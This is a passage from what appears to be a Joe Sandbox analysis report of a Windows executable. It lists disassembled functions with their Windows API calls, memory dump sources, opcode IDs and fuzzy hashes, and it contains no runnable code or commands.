                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,0023BEF0,00000000,00215AE3,?,00000000,?,00000000,?,?,?,0021843A,?,40000000,00000005), ref: 00219CD2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 5ddf456fe484b7ac8b1af50611ccb565511052f11ed816a527814b3d6d28eb75
                                                              • Instruction ID: 9b03b2c6a9a882a847d9bb8871c0a1a0339a18a3e665147b1454a93822260327
                                                              • Opcode Fuzzy Hash: 5ddf456fe484b7ac8b1af50611ccb565511052f11ed816a527814b3d6d28eb75
                                                              • Instruction Fuzzy Hash: ABF06D32811129FFCB029E989E859DE7EE9EF18364F104126BE1126160D7718EA0EAE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00225293 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 655b6b22023b99ca6a659c8cd46b03cc24006dc0981fd8f8eb6c7e4e87ad3333
                                                              • Instruction ID: 2eb3ad9b92dfbe7ff0a0732fd28ce18c5c5332c9c7adb51c3c2483fbe3afb1ab
                                                              • Opcode Fuzzy Hash: 655b6b22023b99ca6a659c8cd46b03cc24006dc0981fd8f8eb6c7e4e87ad3333
                                                              • Instruction Fuzzy Hash: 96016D304116A5EFD720EFE4D10979DB7B4BF24304F14868CE8865B282CB35BA58CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00222F92 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __CxxThrowException@8.LIBCMT ref: 00222FD6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw
                                                              • String ID:
                                                              • API String ID: 2005118841-0
                                                              • Opcode ID: 49aabc3323e6a11961cd9b55d559758887ac454a7378691001ce259d8d0ccb44
                                                              • Instruction ID: e6ab203d7e6b8a1a68ba01bcd949f9748c43b763f6732594da2dc0f0f6206d1e
                                                              • Opcode Fuzzy Hash: 49aabc3323e6a11961cd9b55d559758887ac454a7378691001ce259d8d0ccb44
                                                              • Instruction Fuzzy Hash: 29F03470520A12FF8B30EFA9DA81C66B7F8EA047507148859E896C3A00E731FD54CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00225222 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 00225229
                                                                • Part of subcall function 00224F70: __EH_prolog3.LIBCMT ref: 00224F77
                                                                • Part of subcall function 00228054: __EH_prolog3.LIBCMT ref: 0022805B
                                                                • Part of subcall function 00228054: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00225279,?,?,?,00000000,00228585,?,00000000,?,?,000000CC,00220145), ref: 0022808E
                                                                • Part of subcall function 00225293: __EH_prolog3.LIBCMT ref: 0022529A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ObjectSingleWait
                                                              • String ID:
                                                              • API String ID: 3802047751-0
                                                              • Opcode ID: eaf9db362642f3435ab30b28f71aac9bb5c92cc9253a1f1f0abb66313271e026
                                                              • Instruction ID: f28a604ec8026c74dcf658fd8f5d1fa92629b60abf24a273bc7a60db27c7cd53
                                                              • Opcode Fuzzy Hash: eaf9db362642f3435ab30b28f71aac9bb5c92cc9253a1f1f0abb66313271e026
                                                              • Instruction Fuzzy Hash: C5F09070421669FED710F7F4D505BCDBBA86F21304F148188A19963183CB7527188B72
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00220B42 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 00220B49
                                                                • Part of subcall function 00224F70: __EH_prolog3.LIBCMT ref: 00224F77
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 0d6789d525e4d0d553735e5f49d90dea07887c054cd5c9f7272afa4e2e43b21f
                                                              • Instruction ID: d580bf8606f5e3c7c69029ff33cca6c3107ffbb756f6cc6907734980ec1ee19e
                                                              • Opcode Fuzzy Hash: 0d6789d525e4d0d553735e5f49d90dea07887c054cd5c9f7272afa4e2e43b21f
                                                              • Instruction Fuzzy Hash: 8BF082B0910654EFDB10EFA4D405B8EBBB8BF50318F104198F5159B2A2C731AB55CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002250C4 Relevance: 1.5, APIs: 1, Instructions: 15COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 01b5843bf7e37947d66be90b381991b7ed7d4c7ec35489bb506e98891381ea1f
                                                              • Instruction ID: 5ef3ef566713a6349a91aab23f179f598266adc287a9966676fa73c85de846f4
                                                              • Opcode Fuzzy Hash: 01b5843bf7e37947d66be90b381991b7ed7d4c7ec35489bb506e98891381ea1f
                                                              • Instruction Fuzzy Hash: 13E01274620724E7DB20BF54D40A74D7BA2BB64772F508188F4956B2D1CB741960CE51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002169B0 Relevance: 1.5, APIs: 1, Instructions: 14windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageA.USER32(00000405,00000000,00000000,00216381), ref: 002169D5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 9cd0b475fc4d5f048a74b81f851b4037ae567329bb48eee1fbf89107ec316d65
                                                              • Instruction ID: 413221639a183b41d3b87d24e60950416f88d38fc3d78319ae50e768c79bbdbd
                                                              • Opcode Fuzzy Hash: 9cd0b475fc4d5f048a74b81f851b4037ae567329bb48eee1fbf89107ec316d65
                                                              • Instruction Fuzzy Hash: D1D0C9B0210113EFEB100B20BC5C4BA32D4A7657457614835E544F4160F67548A9AB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002234C4 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID:
                                                              • API String ID: 3886170330-0
                                                              • Opcode ID: f992fce6653f51fb91e4556998a489e8271f2ab7b0a661b4514340acdc5b2d17
                                                              • Instruction ID: 1943629b05e866bb3921225e843a4144edde7ddb16e8b07dc4030bd0241b35e3
                                                              • Opcode Fuzzy Hash: f992fce6653f51fb91e4556998a489e8271f2ab7b0a661b4514340acdc5b2d17
                                                              • Instruction Fuzzy Hash: 3DD06776120118FBDF02BFD0DD02FDD3A72BF58755F108150BA0428061C6769A70AF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002218BD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID:
                                                              • API String ID: 3886170330-0
                                                              • Opcode ID: dc823ae1073cfabbed96c28771a5a0e791ba547730e7ba355279fae727853b0e
                                                              • Instruction ID: 416794359261efc858786c270ae0f0e95baaa80ec3b83d4cff4b33feedf3391d
                                                              • Opcode Fuzzy Hash: dc823ae1073cfabbed96c28771a5a0e791ba547730e7ba355279fae727853b0e
                                                              • Instruction Fuzzy Hash: BDB092E8678228B3EA40F7F0E04BB1C1110AF20703FA04080B20415082C9B61A389A23
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00227FD7 Relevance: 1.3, APIs: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00227E46: CreateEventA.KERNEL32(00000000,?,00000000,00000000), ref: 00227E5B
                                                              • GetLastError.KERNEL32 ref: 0022803E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorEventLast
                                                              • String ID:
                                                              • API String ID: 545576003-0
                                                              • Opcode ID: b5d19faa529440238ca54d4faa817467354bd460d1e06e348141be85bf15dab7
                                                              • Instruction ID: 43acab1e7d5be10800debe30c737d691a3935974254c19a9ef52ce86991ca121
                                                              • Opcode Fuzzy Hash: b5d19faa529440238ca54d4faa817467354bd460d1e06e348141be85bf15dab7
                                                              • Instruction Fuzzy Hash: B7018BF1529226BE9720AEE0ACC5C7B76ACDE55348340483DF142C2801EB74EE688A31
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00218417 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00219CA3: CreateFileW.KERNELBASE(?,?,0023BEF0,00000000,00215AE3,?,00000000,?,00000000,?,?,?,0021843A,?,40000000,00000005), ref: 00219CD2
                                                              • GetLastError.KERNEL32(?,40000000,00000005,00000002,00000080,00000000,00000000,?,00215AE3,0023BEF0), ref: 00218444
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorFileLast
                                                              • String ID:
                                                              • API String ID: 1214770103-0
                                                              • Opcode ID: 0049ed627aff9041f0307bc1e7bc2b00760e0111b8fd0ebb0d72e82e1efce5a9
                                                              • Instruction ID: 470859db32fb53e56fcf837708b2bb95e224d5ba1e78cf9df3539e2b4e75828f
                                                              • Opcode Fuzzy Hash: 0049ed627aff9041f0307bc1e7bc2b00760e0111b8fd0ebb0d72e82e1efce5a9
                                                              • Instruction Fuzzy Hash: BEF02B72D2052667C3311B656C0979A7AD09F61770F164231FF44FB291DF709CA05BD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 002192BB Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 213fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,0023BEF0), ref: 0021930C
                                                              • GetLastError.KERNEL32 ref: 00219319
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00219354
                                                              • GetLastError.KERNEL32 ref: 0021935A
                                                              • FindFirstFileW.KERNEL32(00000000,?,\*.*,00000000,00000000), ref: 002193CC
                                                              • GetLastError.KERNEL32 ref: 002193DD
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,00000000,00000000), ref: 002194C3
                                                              • GetLastError.KERNEL32 ref: 002194C9
                                                              • DeleteFileW.KERNEL32(00000000,?,00000000,00000000), ref: 002194E7
                                                              • GetLastError.KERNEL32 ref: 002194F1
                                                              • FindNextFileW.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00219516
                                                              • GetLastError.KERNEL32 ref: 00219524
                                                              • FindClose.KERNEL32(000000FF,?,00000000,00000000,0023BEF0), ref: 00219556
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,00000000,00000000,0023BEF0), ref: 0021957A
                                                              • GetLastError.KERNEL32 ref: 00219584
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$File$AttributesFind$CloseDeleteDirectoryFirstNextRemove
                                                              • String ID: \*.*
                                                              • API String ID: 2447602905-1173974218
                                                              • Opcode ID: 189b9a746efa67a7d1617335669a8974c6046d58310f4a57b2a3a00e783b1348
                                                              • Instruction ID: a361b5416f141b1d9be040c9cbf26333f4e05794b9c3ff1b3f4063ca0133b9e4
                                                              • Opcode Fuzzy Hash: 189b9a746efa67a7d1617335669a8974c6046d58310f4a57b2a3a00e783b1348
                                                              • Instruction Fuzzy Hash: DE719532C2163AABDB325F64DC687EDBAE16F24750F4542B0AD15F6190DB318EE0DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021A7B1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,*.*,00000000,?,?,00000000,00000000), ref: 0021A842
                                                              • GetLastError.KERNEL32 ref: 0021A853
                                                              • FindNextFileW.KERNEL32(?,00000010), ref: 0021A904
                                                              • CloseHandle.KERNEL32(000000FF), ref: 0021A954
                                                              • FindClose.KERNEL32(000000FF), ref: 0021A969
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFile$ErrorFirstHandleLastNext
                                                              • String ID: *.*
                                                              • API String ID: 3695076719-438819550
                                                              • Opcode ID: 130ed8e3401e9a2362d40023173e8f07889230f6da9ae71eadce17a830434a6c
                                                              • Instruction ID: 1b398b87edc20610d7526d597e35dbfc754a895c9aafe4dc18d52aa8baa5e34a
                                                              • Opcode Fuzzy Hash: 130ed8e3401e9a2362d40023173e8f07889230f6da9ae71eadce17a830434a6c
                                                              • Instruction Fuzzy Hash: E7517131C1162A9FCB20AF64DC8C6D9B7F4AF24324F1242E5E559A7160EB319EE5CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021B4B3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 17libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(kernel32.dll,?,0021B503), ref: 0021B4C2
                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0021B4D9
                                                              • GetProcAddress.KERNEL32(DecodePointer), ref: 0021B4EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: DecodePointer$EncodePointer$kernel32.dll
                                                              • API String ID: 2238633743-1525541703
                                                              • Opcode ID: 410561dcf50e867f7acbc7b279894d2f04f48190bf52e3281b6f3e78823e46ea
                                                              • Instruction ID: f56e690e66b5c589c525e8ab0f5839be220995902dcce10c9fb7a855001bdb11
                                                              • Opcode Fuzzy Hash: 410561dcf50e867f7acbc7b279894d2f04f48190bf52e3281b6f3e78823e46ea
                                                              • Instruction Fuzzy Hash: F3E0EC71CA02A8EEDB019F65BC5C7C53FE4E769720F204056A94CB2361C7B414E4DF80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00228FF5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 14libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVersion.KERNEL32 ref: 00228FF5
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00229004
                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00229010
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcVersion
                                                              • String ID: KERNEL32.DLL$SetProcessDEPPolicy
                                                              • API String ID: 3310240892-1809394400
                                                              • Opcode ID: a7e6649b0e60fdc747f105b55369658caba896fd1d1a90e44f16f22d2caedf35
                                                              • Instruction ID: 4038f31887a06327ad89cad9982eb80b93f643a7f5845d4b87c136e7985658a1
                                                              • Opcode Fuzzy Hash: a7e6649b0e60fdc747f105b55369658caba896fd1d1a90e44f16f22d2caedf35
                                                              • Instruction Fuzzy Hash: F3D0C920A6025EAADB505BF07C0DB99265A6779741F404414BA0AD10A9DEB082F19915
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002291D5 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32 ref: 0022AE0F
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0022AE24
                                                              • UnhandledExceptionFilter.KERNEL32(00211E14), ref: 0022AE2F
                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0022AE4B
                                                              • TerminateProcess.KERNEL32(00000000), ref: 0022AE52
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                              • String ID:
                                                              • API String ID: 2579439406-0
                                                              • Opcode ID: 554bed5284c03fb57adb948ddb3624f438d42233577a15fc6c17358e54898d76
                                                              • Instruction ID: 987b5361d1a72f4e947f0f3dea916693163897385c1caa07e98ce5f0a21df54f
                                                              • Opcode Fuzzy Hash: 554bed5284c03fb57adb948ddb3624f438d42233577a15fc6c17358e54898d76
                                                              • Instruction Fuzzy Hash: 6921EEB4815708EFC752DF69FC8D6857BB0BB18305F10402AEB1987B60EBB05990CF12
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00218DAE Relevance: 4.6, APIs: 3, Instructions: 51windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FormatMessageW.KERNEL32(000011FF,00000000,00000000,00000000,00000000,00000000,0000000C,00000000,00000000,?,?,?,00215D40,?,00000000,00000000), ref: 00218DE2
                                                              • GetLastError.KERNEL32(?,?,?,00215D40,?,00000000,00000000,0000000C,00000000), ref: 00218DEF
                                                              • LocalFree.KERNEL32(00000000,00000000,?,?,?,00215D40,?,00000000,00000000,0000000C,00000000), ref: 00218E27
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                              • String ID:
                                                              • API String ID: 1365068426-0
                                                              • Opcode ID: ec5e46b73fe85bc5ec08a3579e960b91b88a7d249fb9df16c480b939ea2903b5
                                                              • Instruction ID: 171da9bb7a6bc5dfc0bfcf620f063bbc0f3653130494dbbd20f90371e6c0218c
                                                              • Opcode Fuzzy Hash: ec5e46b73fe85bc5ec08a3579e960b91b88a7d249fb9df16c480b939ea2903b5
                                                              • Instruction Fuzzy Hash: 0C018476910119FBCB159F55DC488EEBAB6EBA4710B154429FA0293240DB708EA1DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0022630E Relevance: 2.6, Strings: 2, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: )$0
                                                              • API String ID: 0-535590263
                                                              • Opcode ID: ce54789b6d2aeb221ede09eae09aeec446451655f0e2859a803aea72b47d9cec
                                                              • Instruction ID: b12ff70faf4d5ba7faf0b6c40e29754a89ff9bb930d8e33461842635187edaa1
                                                              • Opcode Fuzzy Hash: ce54789b6d2aeb221ede09eae09aeec446451655f0e2859a803aea72b47d9cec
                                                              • Instruction Fuzzy Hash: 97419072A283115FD304DE29D88526EB7E1EBC4368F098A3DF4A5D7281C678DA15CF82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002297AE Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00019767), ref: 002297B3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
